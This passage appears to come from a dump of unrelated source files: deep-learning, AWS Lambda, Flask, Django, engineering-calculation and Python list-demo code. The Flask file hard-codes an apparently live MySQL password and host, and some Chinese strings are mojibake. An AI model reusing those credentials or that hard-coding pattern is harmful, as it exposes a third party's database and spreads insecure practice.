    return ResNet(in_plane, Bottleneck, [3, 8, 36, 3])
if __name__ == '__main__':
    # Smoke test: siamese forward pass on random single-channel 64x64 input
    # (both branches receive the same tensor), on GPU when available.
    device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
    device = torch.device(device)
    x0 = torch.rand(128, 1, 64, 64).to(device)
    net = ResNet34(1).to(device)
    out = net(x0, x0)
    print(out)
7,115 | 7bac3b224586f8c42a104123432a7321a1251369 | function handler(event, context, callback){
var
AWS = require("aws-sdk"),
DDB = new AWS.DynamoDB({
apiVersion: "2012-08-10",
region: "us-east-1"
}),
city_str = event.city_str.toUpperCase(),
data = {
city_str: city_str,
temp_int_str: 72
},
response = {},
params = {
TableName: "weather",
KeyConditionExpression: "sc = :v1",
ExpressionAttributeValues: {
":v1":{
S: city_str
}
}
};
DDB.query(params, function(err, data){
var
item = {},
response = {
statusCode: 200,
headers: {},
body: null
};
if(err){
response.statusCode = 500;
console.log(err);
response.body = err;
}else{
// console.log(data.Items[0]);
var data = data.Items[0];
if(data && data.t){
console.log(data.sc.S + " and " + data.t.N);
item = {
temp_int:Number(data.t.N),
city_str: data.sc.S
};
}else{
item = {
city_str: event.city_str
//when we don't return a temp, the client can say city not found
};
}
}
response = item;
// console.log(response);
callback(null, response);
});
}
exports.handler = handler; |
7,116 | d7240703bc4cf9b566e7b50a536c83497cd8c6d7 | from flask import Flask, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# SECURITY(review): live database credentials and the secret key are
# hard-coded in source; move them to environment variables / instance
# config before deploying or sharing this file.
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqldb://sql3354595:7Haz6Ng1fm@sql3.freemysqlhosting.net/sql3354595'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'mysecret'
db = SQLAlchemy(app)
class TipoUsuarios(db.Model):
    """User-type lookup table; one type owns many Usuarios rows."""
    id = db.Column(db.Integer, primary_key=True, nullable=False)
    texto = db.Column(db.String(50))  # human-readable type label
    # Reverse side: each Usuarios row gets a `.tipo` backref; lazy='dynamic'
    # makes `usuarios` a query object rather than a loaded list.
    usuarios = db.relationship('Usuarios', backref='tipo', lazy='dynamic')
    def __init__(self, texto):
        self.texto = texto
class Usuarios(db.Model):
    """Application user; `externa` is the FK to its TipoUsuarios row."""
    id = db.Column(db.Integer, primary_key=True, nullable=False)
    usuario = db.Column(db.String(50))  # user name
    externa = db.Column(db.Integer, db.ForeignKey('tipo_usuarios.id'))
    def __init__(self, usuario):
        self.usuario = usuario
@app.route('/')
def index():
    """Plain-text root route (health check / placeholder)."""
    return 'Hola'
@app.route('/prueba')
def prueba():
    """Render every user with the db.html template."""
    us = Usuarios.query.all()
    return render_template('db.html', us=us)
if __name__ == "__main__":
    # Development server only; debug=True must not reach production.
    app.run(debug=True)
7,117 | 3b29912788fa4cc76f34f52da7728e934ee96637 | include('f469-disco/manifest_f469.py')
freeze('src') |
7,118 | f2292d1816699392663bdbf7a06c334de3b2022c | # ------------------------------------#
# Title: Mailroom Part 1
# Dev: SChang
# Date: Feb 2nd, 2019
# ChangeLog: (Who, When, What)
# SChang,02/02/2019, Created Script
# ------------------------------------#
import os
import sys
import math
# In-memory donor database: donor name -> list of individual gift amounts.
donor_list = {"William Gates": [1010, 2020, 3030],
              "Mark Zuckerberg": [5500, 4400],
              "Jeff Bezos": [6745, 2345, 3845],
              "Paul Allen": [9999, 8888, 7777]
              }
# Interactive flow: identify (or add) a donor, record the gift, print a
# thank-you letter.
def send_ty():
    """Prompt for a donor name and a donation, then print a thank-you note.

    Typing "list" (any case) prints the donor roster; an entry starting
    with "e"/"E" exits without recording anything.
    """
    reply = "list"
    while reply == "list":
        reply = input(""""Provide Donor Full Name, or type: "List" to display a list of all donors => """)
        if reply.lower().strip() == "list":
            # Show the roster; only a literal lower-case "list" re-prompts.
            view_donors()
            continue
        if reply[:1].lower() == "e":
            return None
        donor = reply.strip()
        gift = ask_donation_amount(donor)
        if gift is None:
            return None
        append_donation(donor, gift)
        print(ty_letter(donor, gift), end='\n\n')
# Formats the thank-you letter body for a single donation.
def ty_letter(name, amount):
    """Return the thank-you text for *name* with *amount* shown as $X.XX."""
    return "\n    Thank you, {} for donating ${:.2f}".format(name, amount)
# Prompts for the donation amount used by send_ty.
def ask_donation_amount(name):
    """Ask how much *name* donated and return it as a float.

    Returns None if the user types anything starting with "e"/"E".
    Re-prompts on non-numeric input instead of crashing (the original
    let float() raise ValueError).
    """
    while True:
        response = input(f"How much did {name} donate? ")
        if response[:1].lower() == 'e':
            return None
        try:
            return float(response)
        except ValueError:
            print("Please enter a number, or 'e' to exit.")
# Records one gift, creating the donor's history list on first donation.
def append_donation(name, amount):
    """Append *amount* to *name*'s gift history (adding the donor if new)."""
    history = donor_list.setdefault(name, [])
    history.append(amount)
# Prints the donor roster when "list" is chosen at the prompt.
def view_donors():
    """Print every known donor name, one per line."""
    for name in donor_list:
        print(name)
def report_sort(item):
    """Sort key for report rows: the gift list of a (name, gifts) pair."""
    _name, gifts = item
    return gifts
# function for report that is formatted with donor information
def create_report():
    """Print a table of donors (descending by gift history) with each
    donor's total, gift count, and average gift."""
    print()
    print("{:<20}| Total Given | Num Gifts | Average Gift".format("Donor Name"))
    print("-" * 60)
    # Sorted by the gift list itself (lists compare element-wise).
    for d, v in sorted(donor_list.items(), key=report_sort, reverse=True):
        print("{:<21}${:>11.2f}{:>12} ${:>12.2f}".format(d, sum(v), len(v),
                                                         sum(v) / len(v)))
# Menu option 3: leave the program.
def exit_program():
    """Print a goodbye message and terminate via SystemExit."""
    print("Program Exited!")
    sys.exit()
def main():
    """Menu loop: dispatch the user's choice to the matching action.

    Unknown choices now print a warning and re-prompt instead of raising
    KeyError as the original did; surrounding whitespace in the choice is
    tolerated.
    """
    menu_dict = {
        "1": send_ty,
        "2": create_report,
        "3": exit_program
    }
    prompt_menu = "\n".join(("",
                             "Charity Management Application",
                             "Please choose from below options:",
                             "",
                             "1 - Send a Thank You",
                             "2 - Create a Report",
                             "3 - Exit",
                             ">>> "))
    while True:
        response = input(prompt_menu)
        action = menu_dict.get(response.strip())
        if action is None:
            print("Invalid option, please choose 1, 2 or 3.")
            continue
        action()
if __name__ == "__main__":
    # Guards against code running automatically if module is imported
    main()
|
7,119 | 2e5dbd84eb1f9cc09602df8ef8d7bdd30e1b2f26 | #encoding=utf-8
import json
import os
def get_Userid(path):
    """Extract the user id (file stem) from the 7th backslash-separated
    component of *path*, e.g. ...\\city\\year\\month\\12345.json -> '12345'."""
    component = path.split('\\')[6]
    return component.split('.')[0]
def compose_Json_Path_ToRead(path_json_source, get_id):
    """Build the Windows path "<source>\\<id>.json" for one user id."""
    return "\\".join([path_json_source, str(get_id) + ".json"])
def get_province_city_path_ToRead(province, city, input_year, input_month):
    """Build the month directory that holds the prepared per-user JSON files."""
    parts = ["F:\\Fast_Prepared_Json", str(province), str(city), input_year, input_month]
    return "\\".join(parts)
def read_Json_Source(json_path_to_read, pic_num_least, province, city, get_id):
    """Return the number of lines (one record per line) in the JSON file.

    The extra parameters are accepted for call-site compatibility but are
    not used here.  The original never closed the file handle; a ``with``
    block now closes it deterministically.
    """
    with open(json_path_to_read, encoding='utf-8') as handle:
        return sum(1 for _ in handle)
def gothrough_Source(path_json_source, province, city, pic_num_least):
    """Walk every per-user JSON file under *path_json_source*, print each
    user's record count, and print the grand total at the end."""
    total = 0
    """
    ไธบไบ่ฝๅค็ๅฐไธ่ฝฝ่ฟๅบฆ๏ผๅจๆญคๅ
    ่ฎก็ฎ่ดฆๆทๆปๆฐ
    """
    # (The bare string above is garbled legacy commentary kept verbatim; it
    # roughly says: count accounts here to be able to track download progress.)
    for dirpath, dirnames, filenames in os.walk(path_json_source):
        for filepath in filenames:
            path = os.path.join(dirpath, filepath)
            # Extract the user id from the file name.
            get_id = get_Userid(path)
            # Compose the JSON path and count this user's records.
            json_path_to_read = compose_Json_Path_ToRead(path_json_source, get_id)
            pic_num = read_Json_Source(json_path_to_read, pic_num_least, province, city, get_id)
            print(pic_num)
            total = total+pic_num
    print("TOTAL:", total)
"""
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็็ไปฝๆ็ด่พๅธ๏ผ")
input_province = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๅๅธ๏ผ")
input_city = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๅนดไปฝ๏ผ๏ผ2014๏ผ")
input_year = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๆไปฝ๏ผ๏ผ07๏ผ")
input_month = input()
print("่ฏท่พๅ
ฅๆณ่ฆ่ฟๆปค็ๅพ็ๆฐ็ฎไธ้๏ผ")
pic_num_least = input()
"""
input_province = "ๅนฟไธ็"
input_city = "ๅนฟๅทๅธ"
input_year = "2014"
input_month = "08"
pic_num_least = 1
path_json_source = get_province_city_path_ToRead(input_province,input_city,input_year,input_month)
gothrough_Source(path_json_source,input_province,input_city,pic_num_least)
print("Ok!")
mark = input() |
7,120 | 45856b4c5cbf1d3b414ad769135b2d974bc0a22b | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import unittest
import logging
from cameo.spiderForCROWDCUBE import SpiderForCROWDCUBE
"""
ๆธฌ่ฉฆ ๆๅ CROWDCUBE
"""
class SpiderForCROWDCUBETest(unittest.TestCase):
    """Integration tests that drive the CROWDCUBE spider end to end."""
    # Set up: create the spider and start its web driver before each test.
    def setUp(self):
        logging.basicConfig(level=logging.INFO)
        self.spider = SpiderForCROWDCUBE()
        self.spider.initDriver()
    # Tear down: quit the web driver after each test.
    def tearDown(self):
        self.spider.quitDriver()
    """
    #ๆธฌ่ฉฆ่จปๅๅธณ่
    def test_registerAccount(self):
        logging.info("SpiderForCROWDCUBETest.test_registerAccount")
        self.spider.registerAccount()
    #ๆธฌ่ฉฆ็ปๅ
ฅๅธณ่
    def test_loginAccount(self):
        logging.info("SpiderForCROWDCUBETest.test_loginAccount")
        self.spider.loginAccount()
    #ๆธฌ่ฉฆๆๅ companies page
    def test_downloadCompaniesPage(self):
        logging.info("SpiderForCROWDCUBETest.test_downloadCompaniesPage")
        self.spider.downloadCompaniesPage()
    """
    # (The bare string above is disabled test code kept verbatim: register /
    # login / companies-page tests, per its original Chinese comments.)
    # Test crawling a single company page.
    def test_downloadCompanyPage(self):
        logging.info("SpiderForCROWDCUBETest.test_downloadCompanyPage")
        self.spider.downloadCompanyPage()
# Test entry point (exit=False keeps the interpreter alive after the run).
if __name__ == "__main__":
    unittest.main(exit=False)
|
7,121 | f9cc9348d36c131aa3d34e4f78f67b008a1b565a | # coding: utf-8
"""
__author__: onur koc
"""
import numpy as np
import matplotlib.pyplot as plt
from mpldatacursor import datacursor
#optional to annotate any clicked point
# ------------
# Input values
# ------------
# ----------------------------------------------------------------------
# Convergence-confinement analysis of a circular tunnel: ground reaction
# curve, longitudinal displacement profile (Vlachopoulos & Diederichs),
# and the sprayed-concrete support characteristic line.
# ----------------------------------------------------------------------

# ------------
# Input values
# ------------
gamma = 23        # Specific weight of the rock mass [kN/m^3]
H = 270           # Overburden [m]
nu = 0.3          # Poisson's ratio of the rock [-]
E = 300000        # Modulus of elasticity of the rock [kPa]
p_o = gamma * H   # In-situ stress [kPa]
D = 9             # Diameter of the tunnel [m]
c = 300           # Cohesion of the rock [kPa]
phi = 28          # Friction angle of the rock [deg]
Phi = np.deg2rad(phi)   # Conversion from degrees to radians [rad]

# --------------------------------
# Input values for support members
# --------------------------------
f_ck = 35      # Uniaxial compressive strength of the sprayed concrete [MPa]
E_c = 30000    # Young's modulus of the sprayed concrete [MPa]
nu_c = 0.2     # Poisson's ratio of the sprayed concrete [-]
t_c = 0.25     # Thickness of the sprayed concrete [m]
dis_sup = 0    # Distance of the support member to the face

# Other calculated values
p_i = np.arange(0, p_o, 100)   # Support pressure (array from 0 to in-situ stress) [kPa]
sigma_cm = 2 * c * np.cos(Phi) / (1 - np.sin(Phi))   # Uniaxial strength of the rock mass [kPa]
k = (1 + np.sin(Phi)) / (1 - np.sin(Phi))   # Slope defined by the Mohr-Coulomb criterion [-]

# ----------------------------
# Analysis of tunnel behaviour
# ----------------------------
# Tunnel wall displacement
p_cr = (2 * p_o - sigma_cm) / (1 + k)   # Critical support pressure [kPa]
# Note: if the critical support pressure is smaller than the internal
# support pressure then failure does not occur.
r_o = D / 2   # Radius of the tunnel [m]
u_ie = r_o * (1 + nu) / E * (p_o - p_i)   # Inward radial elastic displacement (p_i variable) [m]
r_p = r_o*(2*(p_o*(k-1)+sigma_cm)/(1+k)/((k-1)*p_i+sigma_cm))**(1/(k-1))   # Radius of the plastic zone [m]
u_ip = r_o*(1+nu)/E*(2*(1-nu)*(p_o-p_cr) * (r_p/r_o)**2-(1-2*nu)*(p_o-p_i))   # Inward radial plastic displacement [m]
# Piecewise curve: elastic branch above the critical pressure, plastic below.
x = []
for i in range(len(p_i)):
    if p_i[i] > p_cr:
        x.append(u_ie[i])
    else:
        x.append(u_ip[i])
u_annot = r_o * (1+nu) / E * (p_o-p_cr)   # The abscissa at the ordinate p_cr

# Longitudinal displacement profile
r_pm = r_o * ((2 * (p_o * (k-1) + sigma_cm)) / ((1+k) * sigma_cm))**(1/(k-1))   # Maximum plastic zone radius [m]
u_im = r_o * (1+nu)/E*(2*(1-nu)*(p_o-p_cr)*(r_pm/r_o)**2-(1-2*nu)*(p_o))   # Maximum displacement [m] (r_p = r_pm; p_i = 0)
u_if = (u_im / 3) * np.exp(-0.15 * (r_pm / r_o))   # Displacement at the tunnel face (Vlachopoulos & Diederichs) [m]

# Displacement ahead of the face
x_ = np.arange(-25, 40, 1)   # Distance from tunnel face: 25 m ahead to 40 m behind [m]
u_ix_a = (u_if) * np.exp(x_ / r_o)   # Tunnel wall displacement ahead of the face (x < 0) [m]
# Displacement behind the face
u_ix_b = u_im*(1-(1-u_if/u_im) * np.exp((-3*x_/r_o) / (2*r_pm/r_o)))   # Tunnel wall displacement behind the face (x > 0) [m]
# Stitch the two branches together at the face (x = 0).
x__ = []
for i in range(len(x_)):
    if x_[i] < 0:
        x__.append(u_ix_a[i])
    else:
        x__.append(u_ix_b[i])
lambda_face = u_if / u_im   # Ratio of face displacement to maximum displacement [-]

# -----------------------
# Analysis of the support
# -----------------------
# Panet curve (kept for reference, Vlachopoulos curve used instead):
#u_io = u_if + (u_im-u_if) * (1-(0.84*r_pm/(dis_sup + 0.84*r_pm))**2)
# Tunnel wall displacement at support installation [m].
# Vlachopoulos curve is as follows:
u_io = u_im*(1-(1-u_if/u_im) * np.exp((-3*dis_sup/r_o) / (2*r_pm/r_o)))
# NOTE(review): the stiffness below uses the rock's `nu`, not the concrete's
# `nu_c` (which is defined but unused) — presumably a slip; confirm against
# the support-stiffness formula before changing.
K_sc = E_c * (r_o**2 - (r_o-t_c)**2) / (2*(1-nu**2)*(r_o-t_c)*r_o**2)   # Stiffness of the sprayed concrete [MPa/m]
p_scmax = f_ck/2 * (1 - (r_o - t_c)**2 / r_o**2)   # Maximum sprayed concrete pressure [MPa]
u_iy = u_io + p_scmax / K_sc   # Yielding point of the sprayed concrete [m]
# Points for the support yield line (installation, yield, plateau).
point_x = [u_io, u_iy, 1.3*u_iy]
point_y = [0, p_scmax, p_scmax]
if __name__ == "__main__":
fig, ax1 = plt.subplots(num=1, dpi=125, edgecolor='w')
ax1.plot(x, p_i/1000, lw=1.5, color='blue')
plt.title('Ground Reaction Curve')
ax1.set_ylabel('Support Pressure $P_i\,[MPa]$', fontsize=12)
ax1.set_xlabel('Tunnel Wall Displacement $u_i\,[m]$', fontsize=12)
for tl in ax1.get_yticklabels():
tl.set_color('b')
ax2 = ax1.twinx()
ax2.plot(x__, x_, lw=1.5, color='red')
ax2.set_ylabel('Distance from tunnel face $x\,[m]$', fontsize=12)
# ax2.axhline(y=0, xmin=u_if, xmax=0.045, color='black')
for tl in ax2.get_yticklabels():
tl.set_color('r')
xposition = [u_if]
yposition = [0, 5]
for xc in xposition:
ax2.axvline(x=xc, color='k', linestyle='--', lw=1.0)
for yc in yposition:
ax2.axhline(y=yc, color='k', linestyle='--', lw=1.0)
datacursor(display='multiple', draggable=True)
plt.figure(num=2, dpi=125, edgecolor='b')
plt.plot(x, p_i/1000, 'b-', lw=1.5)
plt.plot(point_x, point_y, 'r-', lw=1.5)
plt.title('Ground Reaction Curve')
plt.ylabel('Support Pressure $P_i\,[MPa]$', fontsize=12)
plt.xlabel('Tunnel Wall Displacement $u_i\,[m]$', fontsize=12)
datacursor(display='multiple', draggable=True)
plt.show()
|
7,122 | a610ccf4fe154ee12de9212a10958fda2000b425 | import numpy as np
from scipy.linalg import solve
from matplotlib import pylab as plt
def f(x):
    """Target function to approximate: sin(x/5) * e^(x/10) + 5 * e^(-x/2)."""
    return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)
# Interpolate f with polynomials of degree 1, 2 and 3 through hand-picked
# nodes by solving the Vandermonde system A @ w = f(x) for the coefficients
# (w[0] + w[1]*x + w[2]*x**2 + ...), and plot each against the true curve.
# The hand-typed matrices of the original are replaced by np.vander, which
# builds exactly the same systems without transcription errors.
xx = np.arange(1, 15, 0.1)
yy = f(xx)

for nodes in ([1, 15], [1, 8, 15], [1, 4, 10, 15]):
    x = np.array(nodes, dtype=float)
    # Rows are [1, x, x**2, ...] thanks to increasing=True.
    A = np.vander(x, len(x), increasing=True)
    w = solve(A, f(x))
    # Evaluate the fitted polynomial on the dense grid.
    approx = sum(coef * xx**power for power, coef in enumerate(w))
    plt.plot(xx, approx, '-', xx, yy, '-')
    plt.show()

# Coefficients of the final (cubic) fit, rounded to 2 decimals.
print("w 0:4 : ", " ".join(map(str, np.round(w, 2))))
7,123 | d52b6dda7111aefb7f9a7b10ad606cda615389d9 | import time
class Solution(object):
    """Generate all k-combinations of 1..n, via memoized DFS or bottom-up DP."""
    def __init__(self):
        self.n = None            # upper bound of the value range, set per call
        self.memory = dict()     # (start_value, remaining_length) -> cached results
    def dfs(self, bottom, energy):
        """Return all ascending combinations of `energy` values whose first
        element is `bottom` and whose remaining elements come from (bottom, n]."""
        # optimize for memory, save search time for duplicate results
        if (bottom, energy) in self.memory:
            return self.memory[(bottom, energy)]
        # ending search: a length-1 combination is just [bottom]
        if energy == 1:
            return [[bottom]]
        results = []
        # Each recursive call enumerates tails starting strictly above v.
        for v in range(bottom, self.n):
            tail_list = self.dfs(v+1, energy-1)
            for result in tail_list:
                results.append([bottom]+result)
        self.memory[(bottom, energy)] = results
        return results
    def memory_search(self, n, k):
        """Collect combinations by first element i = 1 .. n-k+1 via dfs."""
        self.n = n
        self.memory = dict()
        results = []
        for i in range(1, n+1-k+1):
            combinations = self.dfs(i, k)
            if combinations is not None:
                results = results + combinations
        return results
    def dp(self, n, k):
        """Bottom-up variant using F[n,k] = F[n-1,k] + (c + [n] for c in F[n-1,k-1])."""
        # initialize: F[i, 1] = all single-element combinations from 1..i
        tmp = []
        pre_k_results = {}
        for i in range(1, n+1):
            tmp.append([i])
            pre_k_results[i] = tmp.copy()
        results = pre_k_results
        # Build column k from column k-1; rows range over the feasible i.
        for col in range(2, k+1):
            cur_k_results = {}
            for row in range(col, n-k+col+1):
                cur_results = []
                # Part1: F[row-1, col] — combinations not containing `row`
                # (pre_n_results holds the previous row's list of this column).
                if row > col:
                    cur_results = cur_results + pre_n_results
                # Part2: extend each F[row-1, col-1] combination with `row`.
                for item in pre_k_results[row-1]:
                    cur_results.append(item+[row])
                pre_n_results = cur_results
                cur_k_results[row] = cur_results
            pre_k_results = cur_k_results
            results = cur_k_results
        return results[n]
    def combine(self, n, k):
        """
        :type n: int
        :type k: int
        :rtype: List[List[int]]
        """
        # Either strategy works; dp() is kept as the alternative below.
        results = self.memory_search(n, k)
        # results = self.dp(n, k)
        return results
def main():
    """Benchmark memory_search against dp over a small grid of (n, k)."""
    for n in range(5, 10):
        for k in range(2, n):
            t0 = time.time()
            combos_dfs = Solution().memory_search(n, k)
            memory_search_time = round((time.time() - t0) * 1000 * 1000, 2)
            t0 = time.time()
            combos_dp = Solution().dp(n, k)
            dp_time = round((time.time() - t0) * 1000 * 1000, 2)
            # Same message as before, but with explicit keyword arguments
            # instead of the fragile format(**locals()) idiom.
            print("n={n},k={k} memory_search consume:{memory_search_time}ms, dp consume:{dp_time}ms".format(
                n=n, k=k,
                memory_search_time=memory_search_time,
                dp_time=dp_time))
if __name__ == '__main__':
    main()
7,124 | 12c3fe8a3ca1e660eeb90b16eca17eddd47e5de7 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 17:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration for the KYusers app:
    # adds a read-flag to Message and relaxes CAProfile.regs.
    dependencies = [
        ('KYusers', '0017_caprofile_regs'),
    ]
    operations = [
        # NOTE(review): 'mard_read' looks like a typo for 'marked_read';
        # renaming it now would require a follow-up migration, so it is
        # documented here rather than changed.
        migrations.AddField(
            model_name='message',
            name='mard_read',
            field=models.BooleanField(default=False),
        ),
        # Make CAProfile.regs optional (blank=True) while keeping the
        # reverse accessor name 'regs'.
        migrations.AlterField(
            model_name='caprofile',
            name='regs',
            field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),
        ),
    ]
|
7,125 | c9d25460022bb86c821600dfaed17baa70531c9f | from django.test import TestCase, Client
from django.contrib.auth.models import User
from blog.factories import BlogPostFactory, TagFactory
from blog.models import BlogPost
from faker import Factory
faker = Factory.create()
class ServicesTests(TestCase):
    """Integration tests for the /create-new-post/ view."""
    def setUp(self):
        # One tag, one pre-existing post, a test client and a user whose
        # password is known so the login test can authenticate.
        self.tag = TagFactory()
        self.blog_post = BlogPostFactory()
        self.client = Client()
        self.user = User.objects.create_user(username=faker.name(), password='Ivoepanda')
    def test_create_new_post_service_if_not_logged_user(self):
        """Anonymous users are redirected (302, presumably to login)."""
        self.client.logout()
        response = self.client.get('/create-new-post/')
        self.assertEqual(302, response.status_code)
    def test_create_new_post_service_if_logged_user(self):
        """A logged-in user's POST creates one additional private post."""
        self.client.login(username=self.user.username, password='Ivoepanda')
        # Baseline: only the post created by BlogPostFactory in setUp.
        self.assertEqual(1, BlogPost.objects.get_private_posts().count())
        response = self.client.post('/create-new-post/',
                                    data={"title": faker.name(),
                                          "content": faker.word(),
                                          "author": self.user,
                                          "tags": self.tag})
        # Successful creation redirects, and the private-post count grows.
        self.assertEqual(302, response.status_code)
        self.assertEqual(2, BlogPost.objects.get_private_posts().count())
    def tearDown(self):
        self.client.logout()
|
7,126 | 46194829fc54c2f3e51febde572e05bcff261fb2 | # line_count.py
import sys
# Count the lines arriving on standard input and print the total.
count = 0
for line in sys.stdin:
    count += 1
# BUG FIX: the bare `print count` statement is Python-2-only syntax; the
# parenthesized form prints identically on both Python 2 and Python 3.
print(count)
7,127 | 1a710916461644a0676a3bd84926aeabb2aa3f71 | # coding: utf-8
def init_list():
    """Show the four equivalent ways of constructing a list."""
    print("=== init_list ===")
    via_constructor = list()
    print(via_constructor)
    via_literal = []
    print(via_literal)
    from_tuple = list((1, 2))
    print(from_tuple)
    literal_values = [1, 2]
    print(literal_values)
def insert_append_and_extend_list():
    """Demonstrate the ways of adding elements: insert, append, extend,
    slice assignment and concatenation."""
    print("=== insert_append_and_extend_list ===")
    l = ['e', 'h']
    # insert(-1, ...) inserts BEFORE the last element, not at the end.
    l.insert(-1, 'g')
    print(l)
    l.insert(1, 'f')
    print(l)
    l.insert(0, 'd')
    print(l)
    # An out-of-range index simply appends; no IndexError is raised.
    l.insert(10, 'i')
    print(l)
    l.append('l')
    print(l)
    # extend appends each element of the iterable individually.
    l.extend(['m', 'n'])
    print(l)
    # Assigning to the empty slice [0:0] prepends in place.
    l[0:0] = ['b', 'c']
    print(l)
    # Concatenation builds a new list and rebinds l.
    l = ['a'] + l
    print(l)
def remove_pop_list():
    """Demonstrate removing elements with remove() and pop()."""
    print("=== remove_pop_list ===")
    l = ['a', 'b', 'c', 'd', 'e', 'e']
    print(l)
    print('l.remove: {}'.format(l.remove('e'))) # only removes the first occurrence and returns None
    print(l)
    # l.remove('h') # removing a value that is absent raises ValueError
    # Guard with a membership test to remove safely.
    if 'h' in l:
        l.remove('h')
    # pop() with no argument removes and returns the last element.
    l.pop()
    print(l)
    l.pop(1)
    print('l.pop: {}'.format(l.pop(1)))
    print(l)
    # l.pop(10) # IndexError: pop index out of range
def get_len_count_index_list():
    """Demonstrate indexing, len(), count() and index() on a list."""
    print("=== get_len_count_index_list ===")
    l = ['a', 'b', 'c', 'd', 'e', 'e']
    print(l[0])
    # l[10] = 'z' # IndexError: list index out of range
    # print(l[10]) # IndexError: list index out of range
    # print(l.get(10)) # 'list' object has no attribute 'get'
    print('len: {}'.format(len(l)))
    # count() returns 0 for missing values instead of raising.
    print('count d: {}'.format(l.count('d')))
    print('count e: {}'.format(l.count('e')))
    print('count f: {}'.format(l.count('f')))
    # index() returns the first match, but raises for missing values.
    print('index d: {}'.format(l.index('d')))
    print('index e: {}'.format(l.index('e')))
    # print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list
def sort_reverse_list():
    """Demonstrate in-place sort/reverse versus reversed().

    NOTE: the `cmp=` keyword and the `cmp` builtin below are Python 2
    only; this function fails on Python 3.
    """
    print("=== sort_reverse_list ===")
    l = ['e', 'b', 'c', 'a', 'f', 'd']
    print(l)
    print(l.sort()) # return None
    print(l)
    l.sort(cmp=lambda x, y: -(cmp(x, y)))
    print(l)
    print(l.reverse()) # return None
    print(l)
    print(list(reversed(l))) # return a reversed iterator
    print(l)
def _sort_func(x):
    """Sort key: the sum of an item's first two elements."""
    first, second = x[0], x[1]
    return first + second
def sort_list():
    """Demonstrate sorted() with lambda keys and a named key function."""
    print("=== sort_list ===")
    pairs = [(1, 2), (3, 1), (2, 3)]
    print(sorted(pairs, key=lambda item: item[1]))
    print(sorted(pairs, key=lambda item: item[0]))
    print(sorted(pairs, key=_sort_func))
def list_index():
    """Demonstrate list.index lookup of a value's position."""
    print("=== list_index ===")
    letters = ['a', 'b', 'c']
    print(letters.index('a'))
def list_slice():
    """Demonstrate slicing: out-of-range slices are safe, and slices copy."""
    print("=== list_slice ===")
    l = [1, 2, 3]
    print(l[:1])
    # Slice bounds past the end are clamped, never an IndexError.
    print(l[:5])
    print(l[-1:])
    print(l[-5:])
    print(l[:-1])
    print(l[10:20])
    ls = l[:1]
    ls[0] = 2
    print(ls)
    print(l) # mutating ls does not change l: slicing returns a copy
def list_slice_with_step():
    """Demonstrate extended (stepped) slices: read, assign and delete."""
    print("=== list_slice_with_step ===")
    l = list(range(20))
    print(l[::3])
    print(l[1::3])
    print(l[2::3])
    # Negative step walks the list backwards.
    print(l[::-1])
    # Assigning to an extended slice requires a sequence of exactly the
    # same length (here: 7 positions 0, 3, ..., 18).
    l[::3] = [0, 0, 0, 0, 0, 0, 0]
    print(l)
    # del with an extended slice removes every third element in place.
    del l[::3]
    print(l)
def list_comprehension():
    """Build a list of squares with a list comprehension."""
    print("=== list_comprehension ===")
    squares = [n * n for n in range(3)]
    print(squares)
def test_insert_when_traversing():
    """Demonstrate why you must not mutate a list while iterating it.

    WARNING: this function never terminates — each insert at index 0
    shifts the iteration position back, so the loop hangs forever.
    """
    print("=== test_insert_when_traversing ===")
    l = [3, 4]
    for i in l:
        l.insert(0, -i)
        print(i)
    # this hangs (original note: "ไผšๅกไธ€ไธ‹ๆฅ")
def main():
    """Entry point: uncomment a call below to run that single demo."""
    # init_list()
    # insert_append_and_extend_list()
    # remove_pop_list()
    # get_len_count_index_list()
    # sort_reverse_list()
    # sort_list()
    # list_index()
    list_slice()
    # list_slice_with_step()
    # list_comprehension()
    # test_insert_when_traversing()
if __name__ == '__main__':
    main()
# References:
# https://www.tutorialspoint.com/python/python_lists.htm
# https://stackoverflow.com/a/9028088/3936457
# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list
|
7,128 | 7d43b20ebee2f4cd509bbd896c9e6ae8b2c4b354 | #!/usr/bin/env python3
import torch
import torch.nn as nn
import torch.nn.functional as F
import pytorch_lightning as pl
import torchmetrics
class BaselineModule(pl.LightningModule):
    """CBR-Tiny image classifier (arXiv:1902.07208) as a Lightning module.

    Args:
        input_size: height/width of the square 3-channel input images.
        num_classes: number of output classes.
        lr: Adam learning rate.
    """
    def __init__(self, input_size, num_classes=4, lr=3e-4):
        super().__init__()
        self.backbone = nn.Sequential(  # CBR-Tiny arXiv:1902.07208
            nn.Conv2d(3, 64, 5),
            nn.BatchNorm2d(64),
            nn.ReLU(),
            nn.MaxPool2d(3, 2),
            nn.Conv2d(64, 256, 5),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(3, 2),
            nn.Conv2d(256, 512, 5),
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(3, 2),
            nn.AdaptiveAvgPool2d((1, 1)),
        )
        hidden_size = self._get_hidden_size(input_size)
        self.classifier = nn.Linear(hidden_size, num_classes)
        self.lr = lr
        self.train_acc = torchmetrics.Accuracy()
        self.val_acc = torchmetrics.Accuracy()

    def _get_hidden_size(self, input_size):
        """Return the flattened feature size produced by the backbone.

        BUG FIX: this previously ran the dummy forward pass but returned
        None, so nn.Linear(None, num_classes) failed in __init__.
        """
        with torch.no_grad():
            features = self.backbone(torch.randn(1, 3, input_size, input_size))
        return features.flatten(1).size(1)

    def forward(self, input_tensor):
